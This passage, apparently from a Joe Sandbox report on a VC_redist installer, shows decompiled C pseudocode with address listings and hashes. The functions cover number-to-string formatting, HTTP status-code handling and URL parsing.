						__eflags = _t181;
						if(_t181 != 0) {
							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v48 + 0x88))))));
						} else {
							 *_t146 = 0;
						}
						_t92 = _t172[1] & 0x000fffff;
						__eflags = _t92;
						_v20 = _t92;
						if(_t92 > 0) {
							L23:
							_t33 =  &_v8;
							 *_t33 = _v8 & 0x00000000;
							__eflags =  *_t33;
							_t147 = 0xf0000;
							_t93 = 0x30;
							_v12 = _t93;
							_v20 = 0xf0000;
							do {
								__eflags = _t181;
								if(_t181 <= 0) {
									break;
								}
								_t119 = E00059DD0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
								_t161 = 0x30;
								_t121 = _t119 + _t161 & 0x0000ffff;
								__eflags = _t121 - 0x39;
								if(_t121 > 0x39) {
									_t121 = _t121 + _t136;
									__eflags = _t121;
								}
								_t162 = _v20;
								_t172 = _a4;
								 *_t186 = _t121;
								_t186 = _t186 + 1;
								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
								_t147 = _t162 >> 4;
								_t93 = _v12 - 4;
								_t181 = _t181 - 1;
								_v20 = _t162 >> 4;
								_v12 = _t93;
								__eflags = _t93;
							} while (_t93 >= 0);
							__eflags = _t93;
							if(_t93 < 0) {
								goto L39;
							}
							_t115 = E00059DD0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
							__eflags = _t115 - 8;
							if(_t115 <= 8) {
								goto L39;
							}
							_t54 = _t186 - 1; // 0x42e28
							_t116 = _t54;
							_t138 = 0x30;
							while(1) {
								_t156 =  *_t116;
								__eflags = _t156 - 0x66;
								if(_t156 == 0x66) {
									goto L33;
								}
								__eflags = _t156 - 0x46;
								if(_t156 != 0x46) {
									_t139 = _v32;
									__eflags = _t116 - _v28;
									if(_t116 == _v28) {
										_t57 = _t116 - 1;
										 *_t57 =  *(_t116 - 1) + 1;
										__eflags =  *_t57;
									} else {
										_t157 =  *_t116;
										__eflags = _t157 - 0x39;
										if(_t157 != 0x39) {
											 *_t116 = _t157 + 1;
										} else {
											 *_t116 = _t139 + 0x3a;
										}
									}
									goto L39;
								}
								L33:
								 *_t116 = _t138;
								_t116 = _t116 - 1;
							}
						} else {
							__eflags =  *_t172;
							if( *_t172 <= 0) {
								L39:
								__eflags = _t181;
								if(_t181 > 0) {
									_push(_t181);
									_t111 = 0x30;
									_push(_t111);
									_push(_t186);
									E0003F670(_t181);
									_t186 = _t186 + _t181;
									__eflags = _t186;
								}
								_t94 = _v28;
								__eflags =  *_t94;
								if( *_t94 == 0) {
									_t186 = _t94;
								}
								__eflags = _a28;
								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								_t174 = _a4[1];
								_t100 = E00059DD0( *_a4, 0x34, _t174);
								_t137 = 0;
								_t151 = (_t100 & 0x000007ff) - _v16;
								__eflags = _t151;
								asm("sbb ebx, ebx");
								if(__eflags < 0) {
									L47:
									 *(_t186 + 1) = 0x2d;
									_t187 = _t186 + 2;
									__eflags = _t187;
									_t151 =  ~_t151;
									asm("adc ebx, 0x0");
									_t137 =  ~_t137;
									goto L48;
								} else {
									if(__eflags > 0) {
										L46:
										 *(_t186 + 1) = 0x2b;
										_t187 = _t186 + 2;
										L48:
										_t182 = _t187;
										_t101 = 0x30;
										 *_t187 = _t101;
										__eflags = _t137;
										if(__eflags < 0) {
											L56:
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L60:
												_push(0);
												_push(0xa);
												_push(_t137);
												_push(_t151);
												_t102 = E00059CF0();
												_v32 = _t174;
												 *_t187 = _t102 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												L61:
												_t104 = 0x30;
												_t183 = 0;
												__eflags = 0;
												 *_t187 = _t151 + _t104;
												 *(_t187 + 1) = 0;
												goto L62;
											}
											__eflags = _t137;
											if(__eflags < 0) {
												goto L61;
											}
											if(__eflags > 0) {
												goto L60;
											}
											__eflags = _t151 - 0xa;
											if(_t151 < 0xa) {
												goto L61;
											}
											goto L60;
										}
										if(__eflags > 0) {
											L51:
											_push(0);
											_push(0x3e8);
											_push(_t137);
											_push(_t151);
											_t107 = E00059CF0();
											_v32 = _t174;
											 *_t187 = _t107 + 0x30;
											_t187 = _t187 + 1;
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L55:
												_push(0);
												_push(0x64);
												_push(_t137);
												_push(_t151);
												_t109 = E00059CF0();
												_v32 = _t174;
												 *_t187 = _t109 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												goto L56;
											}
											L52:
											__eflags = _t137;
											if(__eflags < 0) {
												goto L56;
											}
											if(__eflags > 0) {
												goto L55;
											}
											__eflags = _t151 - 0x64;
											if(_t151 < 0x64) {
												goto L56;
											}
											goto L55;
										}
										__eflags = _t151 - 0x3e8;
										if(_t151 < 0x3e8) {
											goto L52;
										}
										goto L51;
									}
									__eflags = _t151;
									if(_t151 < 0) {
										goto L47;
									}
									goto L46;
								}
							}
							goto L23;
						}
					}
					__eflags = 0;
					if(0 != 0) {
						goto L11;
					} else {
						_t183 = E00046D79(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
						__eflags = _t183;
						if(_t183 == 0) {
							_t128 = E00059F30(_t184, 0x65);
							_pop(_t166);
							__eflags = _t128;
							if(_t128 != 0) {
								__eflags = _a28;
								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								__eflags = _t170;
								 *_t128 = _t170;
								 *((char*)(_t128 + 3)) = 0;
							}
							_t183 = 0;
						} else {
							 *_t184 = 0;
						}
						goto L62;
					}
				} else {
					_t129 = E00043E36();
					_t183 = 0x22;
					 *_t129 = _t183;
					E00043D7A();
					L62:
					if(_v40 != 0) {
						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
					}
					return _t183;
				}
			}
























































                                                                          0x00046a76
                                                                          0x00046a81
                                                                          0x00046a88
                                                                          0x00046a8a
                                                                          0x00046a8a
                                                                          0x00046a8c
                                                                          0x00046a95
                                                                          0x00046a97
                                                                          0x00046a9c
                                                                          0x00046aa2
                                                                          0x00046ab8
                                                                          0x00046abd
                                                                          0x00046ac0
                                                                          0x00046acd
                                                                          0x00046ad2
                                                                          0x00046b26
                                                                          0x00046b2e
                                                                          0x00046b30
                                                                          0x00046b32
                                                                          0x00046b35
                                                                          0x00046b35
                                                                          0x00046b35
                                                                          0x00046b3b
                                                                          0x00046b43
                                                                          0x00046b56
                                                                          0x00046b59
                                                                          0x00046b5b
                                                                          0x00046b5e
                                                                          0x00046b5f
                                                                          0x00046b80
                                                                          0x00046b83
                                                                          0x00046b83
                                                                          0x00046b61
                                                                          0x00046b61
                                                                          0x00046b63
                                                                          0x00046b6e
                                                                          0x00046b6e
                                                                          0x00046b70
                                                                          0x00046b77
                                                                          0x00046b72
                                                                          0x00046b72
                                                                          0x00046b72
                                                                          0x00046b70
                                                                          0x00046b84
                                                                          0x00046b86
                                                                          0x00046b87
                                                                          0x00046b8a
                                                                          0x00046b8c
                                                                          0x00046ba0
                                                                          0x00046b8e
                                                                          0x00046b8e
                                                                          0x00046b8e
                                                                          0x00046ba5
                                                                          0x00046ba5
                                                                          0x00046baa
                                                                          0x00046bad
                                                                          0x00046bb8
                                                                          0x00046bb8
                                                                          0x00046bb8
                                                                          0x00046bb8
                                                                          0x00046bbc
                                                                          0x00046bc3
                                                                          0x00046bc4
                                                                          0x00046bc7
                                                                          0x00046bca
                                                                          0x00046bca
                                                                          0x00046bcc
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00046be4
                                                                          0x00046beb
                                                                          0x00046bef
                                                                          0x00046bf2
                                                                          0x00046bf5
                                                                          0x00046bf7
                                                                          0x00046bf7
                                                                          0x00046bf7
                                                                          0x00046bf9
                                                                          0x00046bfc
                                                                          0x00046bff
                                                                          0x00046c01
                                                                          0x00046c09
                                                                          0x00046c0f
                                                                          0x00046c12
                                                                          0x00046c15
                                                                          0x00046c16
                                                                          0x00046c19
                                                                          0x00046c1c
                                                                          0x00046c1c
                                                                          0x00046c21
                                                                          0x00046c24
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00046c3c
                                                                          0x00046c41
                                                                          0x00046c45
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00046c49
                                                                          0x00046c49
                                                                          0x00046c4c
                                                                          0x00046c4d
                                                                          0x00046c4d
                                                                          0x00046c4f
                                                                          0x00046c52
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00046c54
                                                                          0x00046c57
                                                                          0x00046c5e
                                                                          0x00046c61
                                                                          0x00046c64
                                                                          0x00046c7a
                                                                          0x00046c7a
                                                                          0x00046c7a
                                                                          0x00046c66
                                                                          0x00046c66
                                                                          0x00046c68
                                                                          0x00046c6b
                                                                          0x00046c76
                                                                          0x00046c6d
                                                                          0x00046c70
                                                                          0x00046c70
                                                                          0x00046c6b
                                                                          0x00000000
                                                                          0x00046c64
                                                                          0x00046c59
                                                                          0x00046c59
                                                                          0x00046c5b
                                                                          0x00046c5b
                                                                          0x00046baf
                                                                          0x00046baf
                                                                          0x00046bb2
                                                                          0x00046c7d
                                                                          0x00046c7d
                                                                          0x00046c7f
                                                                          0x00046c81
                                                                          0x00046c84
                                                                          0x00046c85
                                                                          0x00046c86
                                                                          0x00046c87
                                                                          0x00046c8f
                                                                          0x00046c8f
                                                                          0x00046c8f
                                                                          0x00046c91
                                                                          0x00046c94
                                                                          0x00046c97
                                                                          0x00046c99
                                                                          0x00046c99
                                                                          0x00046c9b
                                                                          0x00046cad
                                                                          0x00046cb1
                                                                          0x00046cb4
                                                                          0x00046cbb
                                                                          0x00046cc3
                                                                          0x00046cc3
                                                                          0x00046cc6
                                                                          0x00046cc8
                                                                          0x00046cd9
                                                                          0x00046cd9
                                                                          0x00046cdd
                                                                          0x00046cdd
                                                                          0x00046ce0
                                                                          0x00046ce2
                                                                          0x00046ce5
                                                                          0x00000000
                                                                          0x00046cca
                                                                          0x00046cca
                                                                          0x00046cd0
                                                                          0x00046cd0
                                                                          0x00046cd4
                                                                          0x00046ce7
                                                                          0x00046ce7
                                                                          0x00046ceb
                                                                          0x00046cec
                                                                          0x00046cee
                                                                          0x00046cf0
                                                                          0x00046d31
                                                                          0x00046d31
                                                                          0x00046d33
                                                                          0x00046d40
                                                                          0x00046d40
                                                                          0x00046d42
                                                                          0x00046d44
                                                                          0x00046d45
                                                                          0x00046d46
                                                                          0x00046d4d
                                                                          0x00046d50
                                                                          0x00046d52
                                                                          0x00046d52
                                                                          0x00046d53
                                                                          0x00046d55
                                                                          0x00046d58
                                                                          0x00046d58
                                                                          0x00046d5a
                                                                          0x00046d5c
                                                                          0x00000000
                                                                          0x00046d5c
                                                                          0x00046d35
                                                                          0x00046d37
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00046d39
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00046d3b
                                                                          0x00046d3e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00046d3e
                                                                          0x00046cf7
                                                                          0x00046cfd
                                                                          0x00046cfd
                                                                          0x00046cff
                                                                          0x00046d00
                                                                          0x00046d01
                                                                          0x00046d02
                                                                          0x00046d09
                                                                          0x00046d0c
                                                                          0x00046d0e
                                                                          0x00046d0f
                                                                          0x00046d11
                                                                          0x00046d1e
                                                                          0x00046d1e
                                                                          0x00046d20
                                                                          0x00046d22
                                                                          0x00046d23
                                                                          0x00046d24
                                                                          0x00046d2b
                                                                          0x00046d2e
                                                                          0x00046d30
                                                                          0x00046d30
                                                                          0x00000000
                                                                          0x00046d30
                                                                          0x00046d13
                                                                          0x00046d13
                                                                          0x00046d15
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00046d17
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00046d19
                                                                          0x00046d1c
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00046d1c
                                                                          0x00046cf9
                                                                          0x00046cfb
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00046cfb
                                                                          0x00046ccc
                                                                          0x00046cce
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00046cce
                                                                          0x00046cc8
                                                                          0x00000000
                                                                          0x00046bb2
                                                                          0x00046bad
                                                                          0x00046ad4
                                                                          0x00046ad6
                                                                          0x00000000
                                                                          0x00046ad8
                                                                          0x00046aee
                                                                          0x00046af3
                                                                          0x00046af5
                                                                          0x00046b01
                                                                          0x00046b07
                                                                          0x00046b08
                                                                          0x00046b0a
                                                                          0x00046b0c
                                                                          0x00046b17
                                                                          0x00046b17
                                                                          0x00046b1a
                                                                          0x00046b1c
                                                                          0x00046b1c
                                                                          0x00046b1f
                                                                          0x00046af7
                                                                          0x00046af7
                                                                          0x00046af7
                                                                          0x00000000
                                                                          0x00046af5
                                                                          0x00046aa4
                                                                          0x00046aa4
                                                                          0x00046aab
                                                                          0x00046aac
                                                                          0x00046aae
                                                                          0x00046d60
                                                                          0x00046d64
                                                                          0x00046d69
                                                                          0x00046d69
                                                                          0x00046d78
                                                                          0x00046d78

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: __alldvrm$_strrchr
                                                                          • String ID:
                                                                          • API String ID: 1036877536-0
                                                                          • Opcode ID: f3a74c95afe91129e83f4a200ae329e72b68e1b987d16e4549aa364eb4fd1ab8
                                                                          • Instruction ID: 887eeff7fe7c5cc79dc9b2d855805cadb8fed0650121a4fd5db0fdb232bac6b5
                                                                          • Opcode Fuzzy Hash: f3a74c95afe91129e83f4a200ae329e72b68e1b987d16e4549aa364eb4fd1ab8
                                                                          • Instruction Fuzzy Hash: 91A148B1E003869FDB25CF18C8917BEBBE5EF12310F14417ED8859B282E7369941C75A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0005602B Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 159COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 62%
                                                                          			E0005602B(signed int __ecx, intOrPtr _a4, signed int _a8, signed int _a12, signed int _a16, signed int* _a20) {
				signed int _v8;
				signed int _t25;
				signed int* _t29;
				signed int* _t37;
				signed int _t48;
				intOrPtr _t50;
				signed int _t53;
				void* _t58;
				void* _t62;
				void* _t63;
				void* _t64;

				_t39 = __ecx;
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t37 = _a16;
				_t50 = _a4;
				while(1) {
					_a16 = _a16 & 0x00000000;
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(_t50);
					if( *0x7a984() != 0) {
						_t53 = E00058924(_t39, _t50, 0x13,  &_v8);
						__eflags = _t53;
					} else {
						_t53 =  <=  ? GetLastError() : _t31 & 0x0000ffff | 0x80070000;
						E0005012F(_t53, "Failed to send request to URL: %ls, trying to process HTTP status code anyway.",  *_a8);
						_t58 = _t58 + 0xc;
						_t62 = E00058924(_t39, _t50, 0x13,  &_v8);
					}
					if(_t62 < 0) {
						break;
					}
					_t25 = _v8;
					_t39 = 0x194;
					_t63 = _t25 - 0x194;
					if(_t63 > 0) {
						_t39 = 0x19e;
						__eflags = _t25 - 0x19e;
						if(__eflags > 0) {
							_t39 = _t25 - 0x1f6;
							__eflags = _t39;
							if(_t39 == 0) {
								L40:
								_t53 = 0x80070003;
								L41:
								if(_a16 != 0) {
									continue;
								}
								break;
							}
							_t39 = _t39 - 1;
							__eflags = _t39;
							if(_t39 == 0) {
								goto L40;
							}
							_t39 = _t39 - 1;
							__eflags = _t39;
							if(_t39 == 0) {
								L39:
								_t53 = 0x80070102;
								goto L41;
							}
							L38:
							__eflags = _t53;
							_t53 =  >=  ? 0x8000ffff : _t53;
							_t39 = _a8;
							_push( *_a8);
							E0005012F(_t53, "Unknown HTTP status code %d, returned from URL: %ls", _t25);
							_t58 = _t58 + 0x10;
							goto L41;
						}
						if(__eflags == 0) {
							_t53 = 0x80010135;
							goto L41;
						}
						_t39 = _t25 - 0x195;
						__eflags = _t39;
						if(_t39 == 0) {
							_t53 = 0x80070032;
							goto L41;
						}
						_t39 = _t39;
						__eflags = _t39;
						if(_t39 == 0) {
							L30:
							_a16 = _a16 & 0x00000000;
							_t53 = 0x80070005;
							 *_t37 =  *_t37 & 0x00000000;
							_t48 = _a12;
							__eflags = _t48;
							if(_t48 != 0) {
								_t39 =  *_t48;
								__eflags = _t39;
								if(_t39 != 0) {
									_t53 =  *_t39( *((intOrPtr*)(_t48 + 4)), _t50, _t25,  &_a16, _t37);
								}
							}
							goto L41;
						}
						_t39 = _t39 - 1;
						__eflags = _t39;
						if(_t39 == 0) {
							goto L39;
						}
						_t39 = _t39;
						__eflags = _t39;
						if(_t39 != 0) {
							goto L38;
						}
						L29:
						_t53 = 0x80070002;
						goto L41;
					}
					if(_t63 == 0) {
						goto L29;
					}
					_t39 = 0x12f;
					_t64 = _t25 - 0x194;
					if(_t64 > 0) {
						_t39 = _t25 - 0x190;
						__eflags = _t39;
						if(_t39 == 0) {
							_t53 = 0x800700a1;
							goto L41;
						}
						_t39 = _t39 - 1;
						__eflags = _t39;
						if(_t39 == 0) {
							goto L30;
						}
						_t39 = _t39;
						__eflags = _t39;
						if(_t39 != 0) {
							goto L38;
						}
						_t53 = 0x80070005;
						goto L41;
					}
					if(_t64 == 0) {
						L13:
						_t53 = E0005898E(_t39, _t50, 0x33, _a8);
						if(_t53 < 0) {
							break;
						} else {
							 *_t37 = 1;
							goto L41;
						}
					}
					_t39 = _t25 - 0xc8;
					if(_t39 == 0) {
						_t29 = _a20;
						 *_t29 =  *_t29 & 0x00000000;
						__eflags =  *_t29;
						L17:
						_t53 = 0;
						goto L41;
					}
					_t39 = _t39 - 6;
					if(_t39 == 0) {
						 *_a20 = 1;
						goto L17;
					}
					_t39 = _t39 - 0x5f;
					if(_t39 == 0 || _t39 == 0) {
						goto L13;
					} else {
						goto L38;
					}
				}
				return _t53;
			}














                                                                          0x0005602b
                                                                          0x0005602e
                                                                          0x0005602f
                                                                          0x00056034
                                                                          0x00056039
                                                                          0x0005603c
                                                                          0x0005603c
                                                                          0x00056040
                                                                          0x00056042
                                                                          0x00056044
                                                                          0x00056046
                                                                          0x00056048
                                                                          0x00056051
                                                                          0x00056096
                                                                          0x00056098
                                                                          0x00056053
                                                                          0x00056064
                                                                          0x00056072
                                                                          0x00056077
                                                                          0x00056086
                                                                          0x00056086
                                                                          0x0005609a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000560a0
                                                                          0x000560a3
                                                                          0x000560a8
                                                                          0x000560aa
                                                                          0x00056141
                                                                          0x00056146
                                                                          0x00056148
                                                                          0x000561a7
                                                                          0x000561a7
                                                                          0x000561ad
                                                                          0x000561e0
                                                                          0x000561e0
                                                                          0x000561e5
                                                                          0x000561e9
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000561e9
                                                                          0x000561af
                                                                          0x000561af
                                                                          0x000561b2
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000561b4
                                                                          0x000561b4
                                                                          0x000561b7
                                                                          0x000561d9
                                                                          0x000561d9
                                                                          0x00000000
                                                                          0x000561d9
                                                                          0x000561b9
                                                                          0x000561be
                                                                          0x000561c0
                                                                          0x000561c3
                                                                          0x000561c6
                                                                          0x000561cf
                                                                          0x000561d4
                                                                          0x00000000
                                                                          0x000561d4
                                                                          0x0005614a
                                                                          0x0005619e
                                                                          0x00000000
                                                                          0x0005619e
                                                                          0x0005614e
                                                                          0x0005614e
                                                                          0x00056154
                                                                          0x00056197
                                                                          0x00000000
                                                                          0x00056197
                                                                          0x00056157
                                                                          0x00056157
                                                                          0x0005615a
                                                                          0x0005616e
                                                                          0x0005616e
                                                                          0x00056172
                                                                          0x00056177
                                                                          0x0005617a
                                                                          0x0005617d
                                                                          0x0005617f
                                                                          0x00056181
                                                                          0x00056183
                                                                          0x00056185
                                                                          0x00056193
                                                                          0x00056193
                                                                          0x00056185
                                                                          0x00000000
                                                                          0x0005617f
                                                                          0x0005615c
                                                                          0x0005615c
                                                                          0x0005615f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00056162
                                                                          0x00056162
                                                                          0x00056165
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00056167
                                                                          0x00056167
                                                                          0x00000000
                                                                          0x00056167
                                                                          0x000560b0
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000560b6
                                                                          0x000560b9
                                                                          0x000560bb
                                                                          0x00056116
                                                                          0x00056116
                                                                          0x0005611c
                                                                          0x00056137
                                                                          0x00000000
                                                                          0x00056137
                                                                          0x0005611e
                                                                          0x0005611e
                                                                          0x00056121
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00056124
                                                                          0x00056124
                                                                          0x00056127
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0005612d
                                                                          0x00000000
                                                                          0x0005612d
                                                                          0x000560bd
                                                                          0x000560dc
                                                                          0x000560e7
                                                                          0x000560eb
                                                                          0x00000000
                                                                          0x000560f1
                                                                          0x000560f1
                                                                          0x00000000
                                                                          0x000560f1
                                                                          0x000560eb
                                                                          0x000560c1
                                                                          0x000560c7
                                                                          0x00056107
                                                                          0x0005610a
                                                                          0x0005610a
                                                                          0x0005610d
                                                                          0x0005610d
                                                                          0x00000000
                                                                          0x0005610d
                                                                          0x000560c9
                                                                          0x000560cc
                                                                          0x000560ff
                                                                          0x00000000
                                                                          0x000560ff
                                                                          0x000560ce
                                                                          0x000560d1
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000560d1
                                                                          0x000561f7

                                                                          APIs
                                                                          • GetLastError.KERNEL32 ref: 00056053
                                                                            • Part of subcall function 00058924: GetLastError.KERNEL32(?,?,?,00056096,?,00000013,00000000), ref: 00058957
                                                                          Strings
                                                                          • Failed to send request to URL: %ls, trying to process HTTP status code anyway., xrefs: 0005606C
                                                                          • Unknown HTTP status code %d, returned from URL: %ls, xrefs: 000561C9
                                                                          • @Met, xrefs: 00056053
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID: @Met$Failed to send request to URL: %ls, trying to process HTTP status code anyway.$Unknown HTTP status code %d, returned from URL: %ls
                                                                          • API String ID: 1452528299-1126727395
                                                                          • Opcode ID: 1f6d762ba769eccad25d6abf27498cf246b1a7d147f2b2754db1c9c5efaabdff
                                                                          • Instruction ID: 16e6146850c410d6e8d77c4d2ced0ec4163a9aae08015b8e7663f7e3de860a77
                                                                          • Opcode Fuzzy Hash: 1f6d762ba769eccad25d6abf27498cf246b1a7d147f2b2754db1c9c5efaabdff
                                                                          • Instruction Fuzzy Hash: 49412B36A40915A7DB795D68CD2577F3AD8EB01323F5D412DFD02AB2D2CA27CE0882D9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00058A55 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 146COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 78%
                                                                          			E00058A55(void* __edx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, short* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				char _v268;
				char _v528;
				char _v1044;
				char _v5144;
				char _v9244;
				intOrPtr _v9248;
				intOrPtr _v9252;
				intOrPtr _v9256;
				intOrPtr _v9260;
				intOrPtr* _v9264;
				short* _v9268;
				intOrPtr _v9272;
				char* _v9276;
				intOrPtr _v9280;
				char* _v9284;
				intOrPtr _v9288;
				char* _v9292;
				intOrPtr _v9296;
				char* _v9300;
				short _v9304;
				intOrPtr _v9308;
				char* _v9312;
				intOrPtr _v9316;
				char _v9328;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t57;
				short* _t70;
				void* _t76;
				void* _t77;
				void* _t78;
				void* _t79;
				signed short _t81;
				intOrPtr _t90;
				void* _t91;
				intOrPtr* _t94;
				void* _t98;
				intOrPtr _t100;
				void* _t101;
				void* _t104;
				signed int _t108;

				_t98 = __edx;
				E00059F00();
				_t57 =  *0x7a008; // 0xfbf51acb
				_v8 = _t57 ^ _t108;
				_v9260 = _a4;
				_v9264 = _a8;
				_t90 = _a28;
				_v9248 = _a12;
				_v9268 = _a16;
				_t103 = 0;
				_t100 = _a32;
				_v9252 = _a20;
				_v9256 = _a24;
				E0003F670(_t100,  &_v9328, 0, 0x3c);
				_v9328 = 0x3c;
				if(_v9248 != 0) {
					_v9308 = 0x101;
					_v9312 =  &_v1044;
				}
				if(_v9252 != _t103) {
					_v9296 = 0x81;
					_v9300 =  &_v268;
				}
				if(_v9256 != _t103) {
					_v9288 = 0x81;
					_v9292 =  &_v528;
				}
				if(_t90 != 0) {
					_v9280 = 0x801;
					_v9284 =  &_v5144;
				}
				if(_t100 != 0) {
					_v9272 = 0x801;
					_v9276 =  &_v9244;
				}
				_push( &_v9328);
				_push(0x90000000);
				_push(_t103);
				_push(_v9260);
				if( *0x7a990() != 0) {
					_t94 = _v9264;
					if(_t94 != 0) {
						 *_t94 = _v9316;
					}
					_t69 = _v9248;
					if(_v9248 == 0) {
						L16:
						_t70 = _v9268;
						if(_t70 != 0) {
							 *_t70 = _v9304;
						}
						_t71 = _v9252;
						if(_v9252 == 0) {
							L20:
							_t72 = _v9256;
							if(_v9256 == 0) {
								L22:
								if(_t90 == 0) {
									L24:
									if(_t100 != 0) {
										_t103 = E000121A5(_t100, _v9276, _v9272);
									}
									goto L26;
								}
								_t76 = E000121A5(_t90, _v9284, _v9280);
								_t103 = _t76;
								if(_t76 < 0) {
									goto L26;
								}
								goto L24;
							}
							_t77 = E000121A5(_t72, _v9292, _v9288);
							_t103 = _t77;
							if(_t77 < 0) {
								goto L26;
							}
							goto L22;
						} else {
							_t78 = E000121A5(_t71, _v9300, _v9296);
							_t103 = _t78;
							if(_t78 < 0) {
								goto L26;
							}
							goto L20;
						}
					} else {
						_t79 = E000121A5(_t69, _v9312, _v9308);
						_t103 = _t79;
						if(_t79 < 0) {
							goto L26;
						}
						goto L16;
					}
				} else {
					_t81 = GetLastError();
					_t107 =  <=  ? _t81 : _t81 & 0x0000ffff | 0x80070000;
					_t103 =  >=  ? 0x80004005 :  <=  ? _t81 : _t81 & 0x0000ffff | 0x80070000;
					E000137D3(0x80004005, "uriutil.cpp", 0x56,  >=  ? 0x80004005 :  <=  ? _t81 : _t81 & 0x0000ffff | 0x80070000);
					L26:
					_pop(_t101);
					_pop(_t104);
					_pop(_t91);
					return E0003DE36(_t91, _v8 ^ _t108, _t98, _t101, _t104);
				}
			}















































                                                                          0x00058a55
                                                                          0x00058a5d
                                                                          0x00058a62
                                                                          0x00058a69
                                                                          0x00058a6f
                                                                          0x00058a78
                                                                          0x00058a82
                                                                          0x00058a85
                                                                          0x00058a8f
                                                                          0x00058a95
                                                                          0x00058a9b
                                                                          0x00058a9e
                                                                          0x00058aa9
                                                                          0x00058ab7
                                                                          0x00058abf
                                                                          0x00058acf
                                                                          0x00058ad7
                                                                          0x00058ae1
                                                                          0x00058ae1
                                                                          0x00058af2
                                                                          0x00058afa
                                                                          0x00058b00
                                                                          0x00058b00
                                                                          0x00058b0c
                                                                          0x00058b14
                                                                          0x00058b1a
                                                                          0x00058b1a
                                                                          0x00058b27
                                                                          0x00058b2f
                                                                          0x00058b35
                                                                          0x00058b35
                                                                          0x00058b3d
                                                                          0x00058b45
                                                                          0x00058b4b
                                                                          0x00058b4b
                                                                          0x00058b57
                                                                          0x00058b58
                                                                          0x00058b5d
                                                                          0x00058b5e
                                                                          0x00058b6c
                                                                          0x00058b9e
                                                                          0x00058ba6
                                                                          0x00058bae
                                                                          0x00058bae
                                                                          0x00058bb0
                                                                          0x00058bb8
                                                                          0x00058bd6
                                                                          0x00058bd6
                                                                          0x00058bde
                                                                          0x00058be7
                                                                          0x00058be7
                                                                          0x00058bea
                                                                          0x00058bf2
                                                                          0x00058c0c
                                                                          0x00058c0c
                                                                          0x00058c14
                                                                          0x00058c2e
                                                                          0x00058c30
                                                                          0x00058c4a
                                                                          0x00058c4c
                                                                          0x00058c60
                                                                          0x00058c60
                                                                          0x00000000
                                                                          0x00058c4c
                                                                          0x00058c3f
